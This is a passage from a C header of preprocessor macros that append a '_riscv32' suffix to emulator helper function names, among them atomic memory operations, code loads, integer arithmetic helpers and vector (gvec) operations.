cpu_stl_data_ra cpu_stl_data_ra_riscv32 #define cpu_stq_data_ra cpu_stq_data_ra_riscv32 #define cpu_stb_data cpu_stb_data_riscv32 #define cpu_stw_data cpu_stw_data_riscv32 #define cpu_stl_data cpu_stl_data_riscv32 #define cpu_stq_data cpu_stq_data_riscv32 #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_riscv32 #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_riscv32 #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_riscv32 #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_riscv32 #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_riscv32 #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_riscv32 #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_riscv32 #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_riscv32 #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_riscv32 #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_riscv32 #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_riscv32 #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_riscv32 #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_riscv32 #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_riscv32 #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_riscv32 #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_riscv32 #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_riscv32 #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_riscv32 #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_riscv32 #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_riscv32 #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_riscv32 #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_riscv32 #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_riscv32 #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_riscv32 #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_riscv32 #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_riscv32 #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_riscv32 #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_riscv32 #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_riscv32 #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_riscv32 #define helper_atomic_fetch_smaxw_le_mmu helper_atomic_fetch_smaxw_le_mmu_riscv32 #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_riscv32 #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_riscv32 #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_riscv32 #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_riscv32 #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_riscv32 #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_riscv32 #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_riscv32 #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_riscv32 #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_riscv32 #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_riscv32 #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_riscv32 #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_riscv32 #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_riscv32 #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_riscv32 #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_riscv32 #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_riscv32 #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_riscv32 #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_riscv32 #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_riscv32 #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_riscv32 #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_riscv32 #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_riscv32 #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_riscv32 #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_riscv32 #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_riscv32 #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_riscv32 #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_riscv32 #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_riscv32 #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_riscv32 #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_riscv32 #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_riscv32 #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_riscv32 #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_riscv32 #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_riscv32 #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_riscv32 #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_riscv32 #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_riscv32 #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_riscv32 #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_riscv32 #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_riscv32 #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_riscv32 #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_riscv32 #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_riscv32 #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_riscv32 #define helper_atomic_fetch_orl_be_mmu helper_atomic_fetch_orl_be_mmu_riscv32 #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_riscv32 #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_riscv32 #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_riscv32 #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_riscv32 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_riscv32 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_riscv32 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_riscv32 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_riscv32 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_riscv32 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_riscv32 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_riscv32 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_riscv32 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_riscv32 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_riscv32 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_riscv32 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_riscv32 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_riscv32 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_riscv32 #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_riscv32 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_riscv32 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_riscv32 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_riscv32 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_riscv32 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_riscv32 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_riscv32 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_riscv32 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_riscv32 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_riscv32 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_riscv32 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_riscv32 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_riscv32 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_riscv32 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_riscv32 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_riscv32 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_riscv32 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_riscv32 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_riscv32 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_riscv32 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_riscv32 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_riscv32 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_riscv32 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_riscv32 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_riscv32 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_riscv32 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_riscv32 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_riscv32 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_riscv32 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_riscv32 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_riscv32 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_riscv32 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_riscv32 #define helper_atomic_xchgb helper_atomic_xchgb_riscv32 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_riscv32 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_riscv32 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_riscv32 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_riscv32 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_riscv32 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_riscv32 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_riscv32 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_riscv32 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_riscv32 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_riscv32 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_riscv32 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_riscv32 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_riscv32 #define helper_atomic_umin_fetchb helper_atomic_umin_fetchb_riscv32 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_riscv32 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_riscv32 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_riscv32 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_riscv32 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_riscv32 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_riscv32 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_riscv32 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_riscv32 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_riscv32 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_riscv32 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_riscv32 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_riscv32 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_riscv32 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_riscv32 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_riscv32 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_riscv32 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_riscv32 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_riscv32 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_riscv32 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_riscv32 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_riscv32 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_riscv32 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_riscv32 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_riscv32 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_riscv32 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_riscv32 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_riscv32 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_riscv32 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_riscv32 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_riscv32 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_riscv32 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_riscv32 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_riscv32 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_riscv32 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_riscv32 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_riscv32 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_riscv32 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_riscv32 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_riscv32 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_riscv32 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_riscv32 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_riscv32 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_riscv32 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_riscv32 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_riscv32 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_riscv32 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_riscv32 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_riscv32 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_riscv32 #define helper_atomic_fetch_uminl_le helper_atomic_fetch_uminl_le_riscv32 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_riscv32 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_riscv32 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_riscv32 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_riscv32 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_riscv32 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_riscv32 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_riscv32 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_riscv32 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_riscv32 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_riscv32 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_riscv32 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_riscv32 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_riscv32 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_riscv32 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_riscv32 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_riscv32 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_riscv32 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_riscv32 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_riscv32 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_riscv32 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_riscv32 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_riscv32 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_riscv32 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_riscv32 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_riscv32 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_riscv32 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_riscv32 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_riscv32 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_riscv32 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_riscv32 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_riscv32 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_riscv32 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_riscv32 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_riscv32 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_riscv32 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_riscv32 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_riscv32 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_riscv32 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_riscv32 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_riscv32 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_riscv32 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_riscv32 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_riscv32 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_riscv32 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_riscv32 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_riscv32 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_riscv32 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_riscv32 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_riscv32 #define helper_atomic_xor_fetchq_be helper_atomic_xor_fetchq_be_riscv32 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_riscv32 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_riscv32 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_riscv32 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_riscv32 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_riscv32 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_riscv32 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_riscv32 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_riscv32 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_riscv32 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_riscv32 #define cpu_ldub_code cpu_ldub_code_riscv32 #define cpu_lduw_code cpu_lduw_code_riscv32 #define cpu_ldl_code cpu_ldl_code_riscv32 #define cpu_ldq_code cpu_ldq_code_riscv32 #define helper_div_i32 helper_div_i32_riscv32 #define helper_rem_i32 helper_rem_i32_riscv32 #define helper_divu_i32 helper_divu_i32_riscv32 #define helper_remu_i32 helper_remu_i32_riscv32 #define helper_shl_i64 helper_shl_i64_riscv32 #define helper_shr_i64 helper_shr_i64_riscv32 #define helper_sar_i64 helper_sar_i64_riscv32 #define helper_div_i64 helper_div_i64_riscv32 #define helper_rem_i64 helper_rem_i64_riscv32 #define helper_divu_i64 helper_divu_i64_riscv32 #define helper_remu_i64 helper_remu_i64_riscv32 #define helper_muluh_i64 helper_muluh_i64_riscv32 #define helper_mulsh_i64 helper_mulsh_i64_riscv32 #define helper_clz_i32 helper_clz_i32_riscv32 #define helper_ctz_i32 helper_ctz_i32_riscv32 #define helper_clz_i64 helper_clz_i64_riscv32 #define helper_ctz_i64 helper_ctz_i64_riscv32 #define helper_clrsb_i32 helper_clrsb_i32_riscv32 #define helper_clrsb_i64 helper_clrsb_i64_riscv32 #define helper_ctpop_i32 helper_ctpop_i32_riscv32 #define helper_ctpop_i64 helper_ctpop_i64_riscv32 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_riscv32 #define helper_exit_atomic helper_exit_atomic_riscv32 #define helper_gvec_add8 helper_gvec_add8_riscv32 #define helper_gvec_add16 helper_gvec_add16_riscv32 #define helper_gvec_add32 helper_gvec_add32_riscv32 #define helper_gvec_add64 helper_gvec_add64_riscv32 #define helper_gvec_adds8 helper_gvec_adds8_riscv32 #define helper_gvec_adds16 helper_gvec_adds16_riscv32 #define helper_gvec_adds32 helper_gvec_adds32_riscv32 #define helper_gvec_adds64 helper_gvec_adds64_riscv32 #define helper_gvec_sub8 helper_gvec_sub8_riscv32 #define helper_gvec_sub16 helper_gvec_sub16_riscv32 #define helper_gvec_sub32 helper_gvec_sub32_riscv32 #define helper_gvec_sub64 helper_gvec_sub64_riscv32 #define helper_gvec_subs8 helper_gvec_subs8_riscv32 #define helper_gvec_subs16 helper_gvec_subs16_riscv32 #define helper_gvec_subs32 helper_gvec_subs32_riscv32 #define helper_gvec_subs64 helper_gvec_subs64_riscv32 #define helper_gvec_mul8 helper_gvec_mul8_riscv32 #define helper_gvec_mul16 helper_gvec_mul16_riscv32 #define helper_gvec_mul32 helper_gvec_mul32_riscv32 #define helper_gvec_mul64 helper_gvec_mul64_riscv32 #define helper_gvec_muls8 helper_gvec_muls8_riscv32 #define helper_gvec_muls16 helper_gvec_muls16_riscv32 #define helper_gvec_muls32 helper_gvec_muls32_riscv32 #define helper_gvec_muls64 helper_gvec_muls64_riscv32 #define helper_gvec_neg8 helper_gvec_neg8_riscv32 #define helper_gvec_neg16 helper_gvec_neg16_riscv32 #define helper_gvec_neg32 helper_gvec_neg32_riscv32 #define helper_gvec_neg64 helper_gvec_neg64_riscv32 #define helper_gvec_abs8 helper_gvec_abs8_riscv32 #define helper_gvec_abs16 helper_gvec_abs16_riscv32 #define helper_gvec_abs32 helper_gvec_abs32_riscv32 #define helper_gvec_abs64 helper_gvec_abs64_riscv32 #define helper_gvec_mov helper_gvec_mov_riscv32 #define helper_gvec_dup64 helper_gvec_dup64_riscv32 #define helper_gvec_dup32 helper_gvec_dup32_riscv32 #define helper_gvec_dup16 helper_gvec_dup16_riscv32 #define helper_gvec_dup8 helper_gvec_dup8_riscv32 #define helper_gvec_not helper_gvec_not_riscv32 #define helper_gvec_and helper_gvec_and_riscv32 #define helper_gvec_or helper_gvec_or_riscv32 #define helper_gvec_xor helper_gvec_xor_riscv32 #define helper_gvec_andc helper_gvec_andc_riscv32 #define helper_gvec_orc helper_gvec_orc_riscv32 #define helper_gvec_nand helper_gvec_nand_riscv32 #define helper_gvec_nor helper_gvec_nor_riscv32 #define helper_gvec_eqv helper_gvec_eqv_riscv32 #define helper_gvec_ands helper_gvec_ands_riscv32 #define helper_gvec_xors helper_gvec_xors_riscv32 #define helper_gvec_ors helper_gvec_ors_riscv32 #define helper_gvec_shl8i helper_gvec_shl8i_riscv32 #define helper_gvec_shl16i helper_gvec_shl16i_riscv32 #define helper_gvec_shl32i helper_gvec_shl32i_riscv32 #define helper_gvec_shl64i helper_gvec_shl64i_riscv32 #define helper_gvec_shr8i helper_gvec_shr8i_riscv32 #define helper_gvec_shr16i helper_gvec_shr16i_riscv32 #define helper_gvec_shr32i helper_gvec_shr32i_riscv32 #define helper_gvec_shr64i helper_gvec_shr64i_riscv32 #define helper_gvec_sar8i helper_gvec_sar8i_riscv32 #define helper_gvec_sar16i helper_gvec_sar16i_riscv32 #define helper_gvec_sar32i helper_gvec_sar32i_riscv32 #define helper_gvec_sar64i helper_gvec_sar64i_riscv32 #define helper_gvec_shl8v helper_gvec_shl8v_riscv32 #define helper_gvec_shl16v helper_gvec_shl16v_riscv32 #define helper_gvec_shl32v helper_gvec_shl32v_riscv32 #define helper_gvec_shl64v helper_gvec_shl64v_riscv32 #define helper_gvec_shr8v helper_gvec_shr8v_riscv32 #define helper_gvec_shr16v helper_gvec_shr16v_riscv32 #define helper_gvec_shr32v helper_gvec_shr32v_riscv32 #define helper_gvec_shr64v helper_gvec_shr64v_riscv32 #define helper_gvec_sar8v helper_gvec_sar8v_riscv32 #define helper_gvec_sar16v helper_gvec_sar16v_riscv32 #define helper_gvec_sar32v helper_gvec_sar32v_riscv32 #define helper_gvec_sar64v helper_gvec_sar64v_riscv32 #define helper_gvec_eq8 helper_gvec_eq8_riscv32 #define helper_gvec_ne8 helper_gvec_ne8_riscv32 #define helper_gvec_lt8 helper_gvec_lt8_riscv32 #define helper_gvec_le8 helper_gvec_le8_riscv32 #define helper_gvec_ltu8 helper_gvec_ltu8_riscv32 #define helper_gvec_leu8 helper_gvec_leu8_riscv32 #define helper_gvec_eq16 helper_gvec_eq16_riscv32 #define helper_gvec_ne16 helper_gvec_ne16_riscv32 #define helper_gvec_lt16 helper_gvec_lt16_riscv32 #define helper_gvec_le16 helper_gvec_le16_riscv32 #define helper_gvec_ltu16 helper_gvec_ltu16_riscv32 #define helper_gvec_leu16 helper_gvec_leu16_riscv32 #define helper_gvec_eq32 helper_gvec_eq32_riscv32 #define helper_gvec_ne32 helper_gvec_ne32_riscv32 #define helper_gvec_lt32 helper_gvec_lt32_riscv32 #define helper_gvec_le32 helper_gvec_le32_riscv32 #define helper_gvec_ltu32 helper_gvec_ltu32_riscv32 #define helper_gvec_leu32 helper_gvec_leu32_riscv32 #define helper_gvec_eq64 helper_gvec_eq64_riscv32 #define helper_gvec_ne64 helper_gvec_ne64_riscv32 #define helper_gvec_lt64 helper_gvec_lt64_riscv32 #define helper_gvec_le64 helper_gvec_le64_riscv32 #define helper_gvec_ltu64 helper_gvec_ltu64_riscv32 #define helper_gvec_leu64 helper_gvec_leu64_riscv32 #define helper_gvec_ssadd8 helper_gvec_ssadd8_riscv32 #define helper_gvec_ssadd16 helper_gvec_ssadd16_riscv32 #define helper_gvec_ssadd32 helper_gvec_ssadd32_riscv32 #define helper_gvec_ssadd64 helper_gvec_ssadd64_riscv32 #define helper_gvec_sssub8 helper_gvec_sssub8_riscv32 #define helper_gvec_sssub16 helper_gvec_sssub16_riscv32 #define helper_gvec_sssub32 helper_gvec_sssub32_riscv32 #define helper_gvec_sssub64 helper_gvec_sssub64_riscv32 #define helper_gvec_usadd8 helper_gvec_usadd8_riscv32 #define helper_gvec_usadd16 helper_gvec_usadd16_riscv32 #define helper_gvec_usadd32 helper_gvec_usadd32_riscv32 #define helper_gvec_usadd64 helper_gvec_usadd64_riscv32 #define helper_gvec_ussub8 helper_gvec_ussub8_riscv32 #define helper_gvec_ussub16 helper_gvec_ussub16_riscv32 #define helper_gvec_ussub32 helper_gvec_ussub32_riscv32 #define helper_gvec_ussub64 helper_gvec_ussub64_riscv32 #define helper_gvec_smin8 helper_gvec_smin8_riscv32 #define helper_gvec_smin16 helper_gvec_smin16_riscv32 #define helper_gvec_smin32 helper_gvec_smin32_riscv32 #define 